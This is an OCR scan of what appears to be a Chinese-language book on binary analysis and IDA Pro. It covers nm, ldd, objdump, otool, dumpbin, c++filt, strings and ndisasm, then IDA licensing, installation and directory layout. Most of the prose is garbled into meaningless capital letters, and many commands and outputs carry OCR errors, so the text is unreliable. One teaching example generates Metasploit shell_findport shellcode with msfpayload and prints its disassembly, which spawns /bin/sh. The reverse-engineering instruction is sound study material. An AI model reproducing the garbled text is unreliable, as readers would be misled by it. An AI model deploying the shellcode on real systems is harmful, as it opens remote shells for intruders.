seth, —AGA strip HALAL T AT MARA RMT HEF. BRERA BH
BARA EAR IMES SRR, ABARAT G AS SH Gh REAR ARE ER
file RASA ASS we. RATS LT RHR, file
FL FARA BES REO EE. ORT LB — SE EE AE PEPER 4
EBOH Java WXDROPSI CA FE BA BE, HUES: —F L2RWUL. LIM, file ait harieacny
SPARED CRF 64 Java RRA. ARE, MELE M2 RIPE CA SCH RU
Dyik—P MS-DOS THAT A. FELLER, ARMS ATE AT LA AR
BRE Be FRB ICL TALE SPT MNIA, EP BEI HR,
2.1.2 PE Tools
PE Tools” 2—#FH T4367 Windows #4 PTE AS 7 ERE TAT BVT CHL PE Tools (13
FTA 2-1 AR, PT AER, PRAT CEL UPA PE Tools WIT KALA.
DB p//pctoats org ulpetools btm,
40 F2E HHSAT RIA
ERERAUZEP LPR ERE FEB RTIET SCE, ULATLAGEFH PE Sniffer
SFT AE FL BAT SCE AT aR, CC HD RSE FT
UME, Tools RARE T SPOTS HSCEI. Sb, APSE AT VAAN PE Editor
FRAGA PE ESL TBR, CBT AE Vy ECTS, A, MRA
CFR AT — RO PE, BBE PE ESL
ARIA (obfuscation) HETHRARE AMAA, RAT TRATAA A, BM RET
REBAATTAUNTA. HISHAL, BERTRAM MRA, PRY EA PEA
LEEER. UF HAMHERRHARA T RAMA, AB ILAM To. AE
BUT ALE UR, abet. ANAS 21 Rif wep MM
Ry VACATE LAL,
2.1.3 PEID
PEID* 53 —&K Windows TA, ERAT WHER —HE Windows PE — tdci GR
FAROREERS, FFOR TELE (AFP SU Windows PE UEC (FHA. Hel 2-2 Bar 7 MMT EF PED
AEB Gaobot 8h 21) —TE TAM LA (eB ASPack ).
22 PRD SATA
PED HUF APSCLDI AES PE Tools MSREAIIR], fH Gas PRICES. WA IEE
JETER. ITER RICE.
2.2 BIR
APPRAISERS — ERIE SCARIEST AR, DA AERC LSPS , mE
DBA huptipeia.into!.
(@ HM http:/securityresponse symantec.com/security_response/writeup jsp?docid=2003-112112-1102-99.
2.2 HSER 1S
SERS T ARES B. ABEL AAR RH E MEO, EE
BE LEA LE RECN, FERRET EAH, Bee ACT
FL HE HS PH
2.2.1 nm
SEMPER DT, SPR ATA HES SEER) APS THRE, DA AEE
BRPES AS ERICH LAB IUT SCPE, BEARER TES 005 | A, BRIERE As USE He RE HY
AU DAT ICP PASS, UU, RERERRRL A CoH BROCE BES AE a ATIC. AE
nm FARE, STARA “AE PS” 5
OL nm Ree Te RE (PS 0 PCIE, MEADS CEE) BY, BURR ee
SANSA 7 EH BHC Se GE IS A nm SEPT LHR A LF BA
‘idabook# gee -c cha_exanple-c
idabook# nm ch2_exanple.o
U _stderrp
U exit
U fprinté
(00000038 T get_max
‘00000000 t hidden
(00000088 T main
(90000000 D my initialized global
(00000004 C my unitialized global
U print#
U rand
U scanF
U srand
U tine
‘00000020 T usage
idabook#
SMP AT LAB, nm Fits TA — MESSE SHR SESE ER IE
RASH, HTN PMT UEP, FE
U, REL FES, ROSAS i
1, EIB LINES, Re
t, EXCRETE S. ECRIFP, RMESER SAT —THSRM.
D, Cpe eae.
Cy ARLE ECR.
WH ASPSATEARS, LEFEMATAMT, HRM SFT MHAF PROM
Tt aE.
16 2% KHHRICBIR
SURE nm PETITE PAS, SARA RTH. CRE, AE
Se Meh CHOATE). Ast, et nm, HER PRES RG. FTA nm Ab
FTTH AS BL
dabook gee -0 ch2_example ch2_exanple.c
dabook# nm ch2_exanple
anaes
Uexit
U fprintf
o80485¢0 t frane_dunny
08048644 T get_max
(0804860c t hidden
08048694 T main
0804997¢ D my initialized global
08049a9¢ 8 my_unitialized global
0804980 b object.2
08049978 d p.0
U printf
U rand
U scant
U srand
U tine
o804861c T usage
dabook#
CEP IF YASS Cn main) BeSrHe T MaMa, EASA Tees (hn
frame_dummy ), 53—2e*F 5 (Mn my_unitialized_global ) MSS See Tames, FRA THS ch FR
BURSbARES, THI WARE AES. PER MIE BRITT Che Ths — EE,
Jai, ASE AOR SHEE CHASTE L. KI MEBAR mm HE, ABD nm Ft.
2.2.2 Idd
BUBERT RATIOS, RTT RSCHES | FARE PE PRG HEL SEE SS TP PA ET RT
SERRAAUTH: #42648 (static linking ) #144 4s444% (dynamic linking ), HER M STS
POE LUA ERB. TABATA WBE. BREE, MOANA.
GN BER RTE PAE, EERE SoHE LUBE 9 BRC UT TG ES I, AER
MADUT IOS. 2, ATMA, AW EEROS ETE.
ORE: A, Re UE A, AIAN HR
BC BCA ET FAME TAB HERE Ae RA OT PAT ICA 5 SEP RE OS,
REPRE ETT HBR Ss EHP, 9 — LE BE AY, BOP RA ET EE. AAS) TPR IE,
PASE LIISA. ESTA PARE EAS , SEILER RHEE
GSE HE” AL “Se aM — 4 Fa — UE” IBA. BUDGE 12 FRITH EM RAS
D WT ES ALBERT, TEED John Levine HSE Linkers ae Loaders (San Francisco: Morgan Kaufinann, 2000
22 MRLR 7
ELE ET 1 TR IA.
SSE SO SHHEAM, (HD SREN, ERR RRA HC REO HZ,
eR HERO GHA so BRA SHE) EASA BUR RAT TSCeR, Ply, NPS
LOST ATSIC ae, TIL, OUTTA SHERPA LAT, Ly SAREE
PONE (BES UES), WES, RCRA R AOR, Bay
PAS BIE — 15 FAB it CE, AEH AE — ae, EER SE eth
BILE. ARLE ALITA MRO, IPRA ANTED , MOAR Mae ORB
PERE DAREN — TRAE, SURE ANA BART, it
EMBASE EDTA PES 5 MUR — ARETE ERE TG RESP, PEKAR
KLE RPS TBR
Fm HO HB TR FR as AS BT A RR EMERG,
EL Baa FH $1 1¢ TARR Bi ae ICE
‘idabook# gce -0 ch2 example dynamic ch2_exanple.c
idabook# gce -0 ch2_example_static ch2_exanple.c --static
Adabook# 1s -1 ch2 example *
Xd root wheel 6017 Sep 26 12:24 ch2_exanple_dynanic
x 1 root wheel 167987 Sep 26 11:23 ch2_example_static
idabook# file ch2_example_*
cha_example_dynanic: ELF 32-bit (58 executable, Intel 80386, version 1
(FreeBsb), dynamically Linked (uses shared libs), not stripped
ch2_exanple_static: ELF 32-bit LS8 executable, Intel 80386, version 1
(FreeBSD), statically Linked, not stripped
idabookt
AT UR AASRERE TEASE, BAS HEIR — UM CUTER ONE BE ICE, LA SE
SCPE MATS FER. ltt, SAS ERE UL SCE ANIA, BRA TOT SS Mat — sa ET EL
SUF RIRFESCHF. Idd (list dynamic dependencies ) 32—/MiAM SALA, WE ARRAIAE ara
DATA ASM, AEF ERE TITHE, FRITH 1dd WARE Apache Web HRI-FEDT RUF.
Adabook# Idd /usr/local/sbin/httpd
Jusr/ocal/sbin/ht tpd:
Libm, 50.4 => /1ib/Libm.so.4 (0x280c5000)
Libaprutil-1.50.2 => /usr/local/1ib/Libaprutil-1.s0.2 (ox2Bodbo00)
Libexpat.so.6 => /usr/local/1ib/Libexpat.so.6 (0x280ef000)
Libiconv.s0.3 => /usx/local/1ib/ibiconv.so.3_ (0x2810d000)
Libapr-1.50.2 =» /usr/local/1ib/libapr-1.so.2 (0x281F2000)
Liberypt.so.3 => /Lib/Libcrypt.so.3, (0x28214000)
Libpthread.so.2 => /1ib/Libpthread.so.2 (0x28232000)
Libc.s0.6 =» /1ib/1ibe.s0.6 (0x28257000)
idabookit
Linux Al BSD & S¢H4i#etst Idd TL. 4E OS X ABEL. (EFA otool CSL, 347 b-L #3 ooo) -L
SHA), WTS AE. #e Windows ALCH, ATLA Visual Studio TAZEP EP MSL
18 #2 RHSRIMIR
“LR dumpb in FARCE, FZ2C: dumpbin /dependents X44»
2.2.3 objdump
5-2 FRI dd AIA), objdump SHAE SH. Bm BRA KAN BE objdump AY
SHBG. TAY BE AY BR, ob jdump LAE T A Mh S47 HE (aL 30+), LAER
BRAHMS AME EL objdump TH PRR SARK A RAR (URI ee
A).
OFS AB, BP SCE HEA
O SRAM, BRAM, &
UPAR
OR, HERE TE
0 FSR, DEI nm ATCA SRA
O BUCHER, objdump MICH PICA URSA TREE Ho BULB x86
ASAT, objdump PT LAME AT&T BR Intel HE, IF MT LAE RITA RHR TE TE SCAR ICES
BORE ARCOM ISIE RGA (dead listing ), EKA SCH A AF Seat tT
FR, LEVER, IC BR HI
objdump 4 GNU binutils” Ae H—264}, AU PTLAZE Linux, FreeBSD #1 Windows (ii
at Cygwin) ABE PRB TA. objdump Het — FES AHRR AEE libbéd ( — abl TAA
AE) RVI ERIC, Fuk, CHeReAROT libbid SARIS (ELF. PE). Sb,
2K readel f MSC FATLAAL ET ALPARET ELF H+. readelt YASIR objdump HA, EAT
ZIBLAY SEBS SEF readel f IF AHO libbid.
2.2.4 otool
otoo) BI FFM STS OS X Mach-O SiS AAS. Alt, AT fe URE SCE OS X
SEF MILF ob jdump MIST TA, FmHA T SIeT8EH oto) Sh—> Mach-O — iit
WM APERBLCR , IMTTRUTAMLF 1ad HHH.
‘idabook# file osx_example
osx_example: Mach-0 executable ppc
idabook# otool -L osx_exanple
osx_example:
Just/ib/Libstdcr+.6.dylib (compatibility version 7.0.0, current version 7.4.0)
Zusr/1ib/Libgce_s.1.dylib (compatibility version 1.0.0, current version 1.0.0)
Just/1ib/LibSysten.8.dylib (compatibility version 1.0.0, current version 88.1.5)
otoo) AUT F BAR SIEM SABA S REA OAR, MICU La.
TRELHK otool WMMAR, ASMHKF A.
TAL DART Aa Ee, fH od AE
D BI hap://vww.gnu.org/sofware/bimutls/.
22 #&IR 19
2.2.5 dumpbin
dunpbin ff Visual Studio TAZEHEH i —Mir fT SH LH. “5 otoo! Al objdump FF,
dunpbin BT LAB AR ACHES Windows PE X47 2018. Fie BF BLA T AUTH dumpbin Lie
ALF dd BDF sR EBA Windows 11H SPRY MBAR.
$ dumpbin /dependents calc.exe
Microsoft (R) COFF/PE Dunper Version 8.00, 50727.762
Copyright (C) Microsoft Corporation. All rights reserved.
Dunp of file calc.exe
File Type: EXECUTABLE IMAGE
Image has the following dependencies:
SHELL32-d11
msvert.dL1
‘ADVAPI32.dLL
KERNEL32 411
132.411
USER32.d11
dumpbin AO SUfbETTA A PE Eta SCE RSET, SLITS. SRA BURR.
1, BOR BCA HUBLI ARES KT AEA KOA FAD dumpbin A942, EVITA Mirerosoft Developer
Network (MSDN ) °.
2.2.6 cHfilt
HF OLS RO Ak, Bi, SCR OR CR ROT aT —
FADS, LARS TRS BS. FIR CH SBA T7829 demo MRR BCAH IL.
A RRA:
Void dena(void);
void demo(int x);
void demo(double x);
void deno(int x, double y);
void deno(double x, int y);
void deno(char* str);
5, TRAPATT A RAL, SER, SHEARS BS
ARYA HPL RBS RA AP, SAT Dy ARICA Ef AAS IRE A
Bee DME PRE (LS ALM (name mangling) °. MUSCAT nm FEHR NTTATED CoS
@ 42 tmpy/msdn microsoft. conven-usibraryth23y6e(VS.71) aspx.
QAKAIASPER, HS hup./en wikipedia org/wikiName_ mangling.
20. #2% BOSATAIA
BRERA PHATE, HERON FSR (CAM, DIZEHH SEAS demo AUR RARA ):
idabook# g++ -0 cpp_test cpp_test.cpp
idabook# nm cpp_test | grep demo
0804843c T _ZadenoPc
08048400 T _Zadenod
08048428 T _Zademodi
0804834 T _Zédenoi
08048414 T “Z4denoid
0804834 T _Zadenov
CHEER % PRAT HSE BRE, A, PBT ATC RE. TE
SRL AY demo PARR TAR, BRAT RE (HON gH) 4 Re
BROLA, cofilt ERRATA. cHfilt MAA MS PA RRS 19% BE
(mangled name ), IFUL WUE DFARS PRR. LURKER EP AMARA ES,
BBA, coi t RRB AZ AEN I ks WR Cred t RTE TS Bs, IB EEE
ML RAK
HORE EAT rm SAU AIRES coe Pit AE, PET DB ee RA BR, AI Ta
dabook# nm cpp_test | grep deno | c++filt
(0804843¢ T demo(char*)
(08048400 T demo(double)
08048428 T demo(double, int)
080483fa T dewo( int)
08048414 T demo(int, double)
0804834 T demo()
(APE, ee BROT ARS FS A RA. TTL, om Fete SHE
Gk. FED LR, TREE, EARNED, BME HT AE
MASKS RBA EA RE
23 RERWIAR
BIBL, RNEBHET ALA, ARE LA, ALE AMS
BARRE AEA TAR SPT, ELT DEBRA TESA SZ BACH EE BH
FER WH, BUTE ES AT ERE PI ETA
2.3.1 strings
FART, BES EAE A LET, BAR ANS BE TEC ee BT FB A A]
Si, WRATH, BLN: “LSS? ORR, TERI ZH. aT
FeV — AV: “BURA ERE?” ERATE EA PRG PL els FT EE REE
23 RRRMIR 21
PRA. HH, HA — ELL, BRET KRA—MeEM SAR. Blt,
TYLER 4 MESEATIT A) ASCH FEAR, SPHERE A ITED OK, HL, 1
RARER LEE TR, GE BLP BCP SRE UR TERK Word SCY
PERRET E,
strings SMT AGF RRP THEA, MH, KARTARS SAH
AMR. BUH strings MRURE (Bas 47H 71 ASCHIFA ), WBE
HR.
dabook# strings cha_exanple
Nib/id-Linux.50.2
—_gnon_start__
Tibc.s0.6
_I0 stdin used
exit
srand
puts
‘tine
printf
stderr
fwrite
scanf
__libe_start_nain
Gltec_2.0
PTRh
tl
usage: ch2_example nax}
A simple guessing gane!
Please guess a number between 1 and %d.
Invalid input, quitting!
Congratulations, you got it in %d attempt(s)!
Sorry too low, please try again
Sorry too high, please try again
AE, RNR, EARP, ES RRS RUE ZT. At,
POA REIL OURIE EST RTE FRE. TARAS ARROF, HEE strings ASH
JEWEL WOE. FREE: SU PSR EER, PRAISE
FORA TEE
FRE strings Mt RSM,
O AH, FEAF strings AE PTATICA, BRATASL TF, strings MOSH
FAR, OS. GEM OAT SMa ALBA strings FE TICE
O strings REHM PAPE PAA. QM OTS Rt AS strings BARB
FEE BO
O FEET HEME, MRSS Ec WE strings PRE EOE, 0 16
1% Unicode F¥¥ 0
2 2% KRHHRCBIA
23.2 Ril
OTST AAR, AAAS TAA T LE AE BRC EA A RIT. PE,
ELF fl MACH-O 5¢/F8] 435M dumpbin, objdump #1 otoo) BET RILM. (EE, EAR AU EELAT
ABFA ERAS SS UE ER. ALAR, HA PSB) RFE ASCP
FHSCIE, AEROS TF, ORB AG SE — SORE AT Pe BT A BT
FUBININF x86 F842 SEN A A ILM & ( stream disassembler ): ndisasm #1 diStorn™, ndisasm
H& Netwide Assembler (NASM ) 7t1f4)—4- TAL. FTAA BF BEAA T aOrfar GE) ndisasm BALA —
Bit Metasploit 3274 Ly shelleode:
idabook# ./nsfpayload Linux/x86/shell_findport CPORT=4444 R > fs
idabook# Is -1 fs
s1-r--1-- 1 ida ida 62 Dec 11 15:49 fs
idabook® ndisasm -u fs
‘90000000 3102 xor edx,edx
‘ooog0002 52 push edx
‘00000003 8965 mov ebp,esp
190000005. 6407 push byte +0x7
00000007 5B pop ebx"
(00000008 6at0 push byte +0x10
(00900008 54 push esp
00000008 55 push ebp
000000 52 push edx
00000000 89E2 mov ecx,e5p
(000000F FFO2 sine dword [ecx]
0000013 6A66 push byte +0x66
(0000013 58 op eax
0000014 cb80 int ox80
00000016 66817002115C cmp word [ebp+0x2],0x5c11,
co0c01¢ 75F2 nz oxf
0000016 58 op ebx
000001F §R02 push byte +0x2
ooocc2 $9 op ecx
00000022 BO3F mov al, 0x3
0000024 CD80 int 0x80
00000026 49 dec ecx
(00000027 79F9 ins 0x22
0000029 52 push edx
(0000002 682F2F7368 push dword ox68732f2F
0000002F | 682F52696E push dword 0x6e69622F
‘90000034 8963, nov ebx,esp
(00000036 s2 push edx
(90000037 53 push ebx
(90000038 8962 ov eck,esp
D BA hupsiworwragestorm net/distorm/,
@ 26 hitpyinesm sourceforge net/.
@ BN hupsAvww.metasploit.conv
24 dst 23
(00000034 8008 ov al,oxb
(0000003¢ CD80 int 0x80
EPR CROCE UE, BUC AS. Glin, Zeca RR aT RE
shellcode HTS ULM BCE Mt, BEAT FAMILAR iz Lt 28 9K BAL aR A440. shellcode HORE
Bhs VASA REAR . Ah — ARAL IRAE 8 ABB ROM AR. ROM "PF
PETER FARSI US, AT SERRE LRRD RE.
24 Ia
ACRE TT ICH TR — ED PET 8, TERE “EAE ECE TT
ARMHOLA. WR AE, BOT AAAEEET IDA RFR. TE TRALEE, BR
AVERT AL, SORE TLD yp TARR IDA BAF PALA Be a BSE TE Se HE
BEBO .
IDA Pro AIR
Bip BARICM ILM (Interactive Disassembler Professional ), Ai] #4 IDA Pro, BK
SZ (GARY IDA, FEAF CAI TH (Lidge ) AY Hex-Rays?Z> a HBF iho
FR IDA HBBRA KM Mfak Guilfanov, ATH fe Mak. +S4E MEAT, IDA BE —TE
Feil Gi) MS-DOS WAY, Xk — AUR, Ay EBT IDA AP IA
BRHUWPYA Sb, IDA (hE GUI RAAT REDTAT IDA SREY Se AiO, Jt Ee RD
DOS hit eRe & ERA fl 6
ILA MTA, IDA ABI FRI RS. TIE, OTHER FR, IDA
BORAT TERA , RATT RIE 8 T FE ARENA F ERI — TAA IDA,
RUA ABUG RRR DARL TERIA PEE PIMC BRR ES, IDA FE
PRES RBNRN, BEOAR RUE AA, Beeiste IDA PHAR ABA
1S, (2 DA WER ARLES, BAVA ARR. HOt, IDA AIEEE
FORA, TH ELBA URE OS ARIS POR CT ARTE RE ICR. BEE RR
SEAHEC CRB >, HEAL RESIN TL PREG E S Bt.
3.1 Hex-Rays 23 3) A 2 ZAR SBR
IDA FAP T LAF URS. IDA Hex-Rays AAA i. A, HD FARR
BURG IDA IWOOT, PAA, BERR IDA MA SS RRO
HRMBRAR. Wik, IDA MHRATAA DataRescue HEHMARA MATE EM “BLE
2” (Hall of Shame), AFT HREML, IDA RA TLE, HSH TERY AA
FAP REE TMS — RARE: 4 —t IDA ABA RED, LE WO — 8h — HE
MUR— GF IDA HEUTE HH RP, Hex-Rays SURE LK ALARA, IIA
PBA. RTH AAT LIE Hex-Rays ft) IDA CHES FSV IDA HY “HER” RAR MTTIE
D BAEK, A—Fitk DataRescue 2 MYA. LAL 2008-4 1 HA, Make FFG TE A CA) Hex Rays HE ALE
DA,
@ HWACHFAOE FE Windows, Linmux #1 OSX,
De UE” CAME RL Hex Rays HREM: bttp://www hex-rays.com/idaprofhallofshame html.
3.2 _HRIDAPro 25
OSC HFEAT EMS, IDA RIM A — AOR Pe TA IDA BK. iM,
Windows KiAAY IDA ASG, Ete 23945 HRT UDP, JERE, FET
SpA HA ADA aD ERY IDA SCOIZEIE 1. YANG, IDA SoHHG SRM TRC SOFA
BUETT TERT AR, MUR OR PASAY IDA SH, IDA Siiaeetah. 1H
BLE, PALE AHL LES IDA SH.
IDA SoHE AT SRR RE AE, UR ECS — BRA SPIRO » TEA
AN, IDA SAB — MARY ida key CFF o MUR TREATS, IDA RELA
SCRAP AE PE IDA IBERE. MEARE, ida key SCPPRREALP GE, FEE
TERRA TRE, FAP UAE To
3.2 3RRRIDA Pro
SG, RELBEN EE, IDA IPIER IRAE MORAL, Hex-Rays 9 AT BARE IDA
HSPLVE. Rat, Hex-Rays HAH TM IDA BATAEOUA RET — A RNR READ,
(EE, BERATED AIO DIRE . BERL RRNEAS I IDA 5.0 (-4RITEAR I 6.1.) HATED FEIE,
BATHETEMER A PUPS MERA. PR STRNASE, Hex-Rays SHE CEM TTA DURE
FURAN. AURELIO] LARA IRN F IDA PIRI AE LAST IDA,
WA, EMOREAU, HABE TAR IDA HGR ATH He BALE) ANA
HRD, PRAISE — Pho
3.2.1 IDARRA
JABIAR 6.0 FFE, IDA BILLZE Windows, Linux #l OS X B) GUI ALM GFT PERF. IDA
FF Qt BPE A GUI EE LR =F ERE BP. REL, IDA Pro Jt
RAUNT NTA, TARA AE, AEP ETS TR
Fil, PURE PATTI HAE, RUA BEE RMN SPAR BA HOS
Hy 540 TE ) SF 30 SALA, TEAL CAH LP REN AE ) USF 50 AoA EA
URE RAHY ELIR x64, AMD64, MIPS. PPC Ail SPARC
3.2.2 IDAFFATIE
ZEHISE IDA HY, FP ALG HEAT IE, Hex-Rays PUMSR: “Ba VETUE (named
license) S—-HEMRAH PAK, AIST MERE HALE. MTEL EAT
EIA 3 — a SRE LAK, PEAT POLO FL Pe A A HE, AUC
(D #18. nepy/wvwoihex-rays.com/daprovidadownfreeware htm.
@ #10 bep:/wwwhex-rays.comv/idaprofidadowndemo htm.
@ #12 bepyivwwhex rays.comldapro/idaproc htm.
@ 85 hip //wwwhex-rays.com/idaprovidaorderhtm
26 #3 IDAPro HMR
ABA OTE.” HERR. BUR A PAT ET EERE OL EERE IDA
FE, (AR AoA eT IDA SHE. TAL, APA, RAZ, IDA AAETE
SUR FTAA bietT.
BAA HFS AREA TE TIEAE, IDA MiP TIE KT TAP xt IDA HT C9
HARA.
3.2.3 MSE IDA
FEMA 6.0 ZT, FAP WIAY IDA fati—* Windows GUI MASA Windows, Linux #1
OS X HUFEM ATH. DARRAS 6.0 FRA, MOSK RAL FUATE SE ALATA ie TT IDA RESCH
AP IDA 6.x (BUA LH PES EEE RES BALE Qi) GUI ARAL. WIR ALP RE BEMIS RT
AFRESH ATE, Hex-Rays HAT OPER. JUST ATLA IDA SUES PO LB ER
GHAR EME IDA, SABAH a FARE] Hex-Rays WE. MRI, A ATR
Pan CAR FBSA, IELTS AEBS ET hh AT DR PR IDA RARE SE, 7
HAJEAL PIRES IDA SDK VARIES TAL. HS. PEFR FRAT SSE IDA HO RRR
IDA O23, HARB PBA PE
HLL, Hex-Rays HUE IDA 26% BAAS RERTEOR HF IDA ASE BRA TEAS EE Pal AE RY
FER DAERAH, CERMA ORES, JHE SRA RICE ERS.
3.2.4 FRIDA
IDAHelp ( 7511) SEAL — TAFE ARE, UES, IDA SHE SISCE
RT AA SU, Seas IDA BOR. RRP, TERE, J
Bile] Hex-Rays 2E ida key (Fo Pa, Hex-Rays SMEAR, IRCA AA
BOTEANE. WR ERRURI IDA RAR, BEAR, ANCA ALA ex-Rays yea
BOF PREGA DTINTT OS.
BS FORA SARE BA, RA PT REA RAR PRR, FATE AIDA,
WB, FRAN EASE IDA BEAN IDA RR, BREAN AR EE I — hee
FSR, DRE EF EBC FETT A ECT I TLRS BL FETA, RT RE SE A
BASIN. AR, ARR Bah, RRC I RO TL AEX IDA Hi
1 HES 17 ET MET IT TEI. D0
3.3 IDA XHRR
fE2—% IDA HEP, PROT REARI, IUSRGSIS IDA ASEAN, WOME Me SPOR MB
34 RIDA 27
SUR RATAAEE ATR, ATH ROBERT BY A eA, RG BERS A ,
REST Hee OE.
ERA ENC. IDA MOSHE T SEA HY ( menu-activated ) HALE, AE,
RXR IDA AAA AAT RA, ERT aRATT HF IDASDK VA BIR RRA
FRANTIC H
O Hex-Rays MAH DMA. Hex-Rays ATH—-TRAL IM”, HAAS IDA AKIN
DERIVE, LEED AE debi. JAP SRB, Ufak Fl Hex-Rays
AN SURRODEDY RAUL RAC, RASTER. FAS AY LS Hee SDK
AUTRE, AER, ASAE Bey IDA AR TRE CHAR AA
ZARB DD.
FARUMAMERT SDK SA, MIRAE “DUBE IC”. (A, WIE IDA
Ah, SPARES SDK Pr imMVTESR I. ALL, Hex-Rays HRT —MPE RR, AF
BEBE 10.000 FETE (FEELHY, 10 000 28TE ). BET AE SDK, Steve Micallef H3#4F IDA Plug-in
Writing in C/C+49 278A AE
Q openRCE.org. http://www.openrce.org 2-H RN MLR, Mee Ae
IDA BEAR SCRE, PAR —ESSER ALPS. 5 Hex-Rays POSH Lb MIRAI, openRCE.org
twhs| THESE A IDA AS, A Ee b Se scm. SR
{PRE TE DD ORE EAL IDA BY BTA
O RCE itiz. MURS (RCE) YES (httpy/www.woodmann.com/) 4% AHS 6H
IDA Pro i XMM. AACA BART IZ, FEAR RMA IDA Pro, TT
ALR TP toe CEA TLL AS
D IDA Palace. MAMET IDA Palace? HATE LIEARUART, (LE, EMRE TET
PEGE IDA HIGHER. FEAT L, Dilebar AT AAR BAT eT IDA B93C
RNR, WRAPPER IDA REM A.
O Mak aot. Mfak HG LAT SANNA IDA FRAICHE, AL eT
1B, RR ERASE I, Hob, Fefth Hex-Rays AIBA iF
TRANS AHERN IDA SIRE, WIE MAE
3.4 BR IDA
JABAL IDA JER ORE Pa, FERS IDA TE, EAB), EPA
ABA utilities Al sdk MAR, HPA SVES ANTAL A Al IDA BF EE CREE
® S42 bupy/www.hex-rays.convidaprofidasupport htm,
® BL hup://www.binarypool.convidapluginwriting/idapw.pdf.
@ BA bitp:/oldidapalace.nev/.
© BL btpstorwwnexbiog com
28 $3¥ IAP HEIR
FERAL HITE). PERERA, CHER BM SHE. RF Windows JAP,
TAP ESC eS Windows 2 RF ARTE. WF Linux Bl OS X JAP, BEER
THESE TH gzip RABI tar SCH
3.4.1 Windows #23
4E Windows RY LAE IDA AEA RIAL. IDA) Windows SARE AF AG Se GAGE HEAT aS,
MRC PRT IDA, BAM T TaMEE. Jah IDA MH Windows ERG,
RBH. HOP RARE RE. MO 3-1 BAR, ORAL LAE EP
SE IDA PYRE AR, MES FRR AR. IR ORE PRA EEE AR, UE
ETULRRA Re, ADRS, RATHU/procs/pe. 1x
3.4.4 324% IDA 5 64 {IDA
IDA BARAT HY RES, ST IDA BRATION idag.exe 45
idag64.exe, WH idaq 45 idag64. MIA ARAZ IK SIZEF : idax64 BEES HE 64 AUS, it
SAT IDA FBT FAS 32 (AC. Att, 4E 64 ARS bie FT IDA IAL EE BOAR IDA BT
Fi TEATS PTT FAVE 32 CNA. Bala, WR 64 te Linux FL aS IDAPython Lie eS
WASH, GRRE 32 WNAREY Python, ARE AA 32 145 64 IEEE, TRE
BARRE RBI.
30, #3 WAP HHA
3.4.5 IDA BRA
FETT RAE IDA ZA, (RAR SEAS RARE IDA 22% A RATS. (A, BER BUTTE
ee WA, REA TR PRA RRA. EABMIR, THA IDA
ASR RINA, BAAS, THF IDA AR RAMEE ER, PRT IDA dhe
Pid + F Bak CT Windows A! Linux FE", BET A ae TF s X¢F OS X AF,
x#6F BRA fi F/idag.app/Contents/MacOS F ).
O cfg. cfg H ROSS MRLEICAE, OHA IDA AOBESCEE ida.chg. GUI BEI FF idagui.ctg
PAB SCABESCHL PUR TRING EE ICHE idatui.cfg. BATHE 11 FESTA IDA H— YES EEA
ACHR.
O ide. ide ARS IDA HABIT IDC STRODE. FATHETESS 15 EAST
total FA IDC SBA
O ids. ids BS oe SCP CIDA TERE RAY IDS 4+), BARS T H AT B
BD IDA WIPES ERE A. He IDs MPa. ST
HP EE 09 TA SR ETT AR IR A GB BEA
fA. SOE COURT) RSMAS
O loaders. loaders BRAS CE Ct MRL AF EAA AT PE BR ELF SC ACHR
IDA SRR. RATE TERS 18 REMIT HE IDA TARA.
Q plugins. plugins BRA ST 1h IDA BER NNRE ( SHOE F eX ) MY IDA BE
Bo RATAER 17 RATE IDA HE
OD procs. procs HARA AY IDA MAT LPM MARR. KEM RERER A IDA HE
PLGA ACARI ONE, HARA ATE IDA FPR ICRA. BATE
FS 19 REMIT IDA AEE BCR.
O sig, sig BRA IDA 724 HRC Hb Al ES, 2 TENDER, IDA
REPS Oe A EAU RES. ATT COTM, BMA Gh IDA BEE
RASHES AVE EEA” (FLIRT ) AEB, KAA TESS 12 EES.
O til, til ADA, IDA SK HA REE TA a
OAS. FRATHETET 13 HREM SY MAO fel
